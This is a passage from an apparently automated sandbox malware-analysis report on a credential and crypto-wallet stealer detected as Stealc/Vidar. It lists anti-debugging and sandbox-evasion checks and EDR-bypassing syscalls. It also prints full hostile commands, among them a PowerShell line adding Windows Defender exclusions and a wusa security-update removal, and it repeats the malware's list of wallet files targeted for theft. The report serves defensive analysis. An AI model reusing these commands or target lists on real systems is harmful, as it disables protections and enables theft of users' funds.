                    Source: C:\ProgramData\GDBFCGIIIJ.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\ProgramData\GDBFCGIIIJ.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeThread information set: HideFromDebugger
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: regmonclass
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: procmon_window_class
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: filemonclass
                    Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess queried: DebugPortJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess queried: DebugPortJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPort
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPort
                    Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,EntryPoint,InternetCloseHandle,0_2_00405000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C7CAC62
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR
                    Adds a directory exclusion to Windows Defender
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\ProgramData\GDBFCGIIIJ.exeNtQueryInformationProcess: Indirect: 0x7FF77459B642Jump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF67E0302FD
                    Source: C:\ProgramData\GDBFCGIIIJ.exeNtQuerySystemInformation: Indirect: 0x7FF7745643B2Jump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF67E02B642
                    Source: C:\ProgramData\GDBFCGIIIJ.exeNtQueryInformationProcess: Indirect: 0x7FF7745A02FDJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeNtSetInformationThread: Indirect: 0x7FF77457617EJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtSetInformationThread: Indirect: 0x7FF67E00617E
                    Source: C:\ProgramData\Google\Chrome\updater.exeNtQuerySystemInformation: Indirect: 0x7FF67DFF43B2
                    Modifies the hosts file
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\GDBFCGIIIJ.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GDBFCGIIIJ.exe "C:\ProgramData\GDBFCGIIIJ.exe" Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7308 -ip 7308Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 2296Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C814760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,0_2_6C814760
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,0_2_6C6F1C30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7CAE71 cpuid 0_2_6C7CAE71
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C718390 NSS_GetVersion,0_2_6C718390

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies power options to not sleep / hibernate
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Modifies the hosts file
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\ProgramData\Google\Chrome\updater.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 0.3.WGo3ga1AL9.exe.2500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.WGo3ga1AL9.exe.2500000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.2420e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
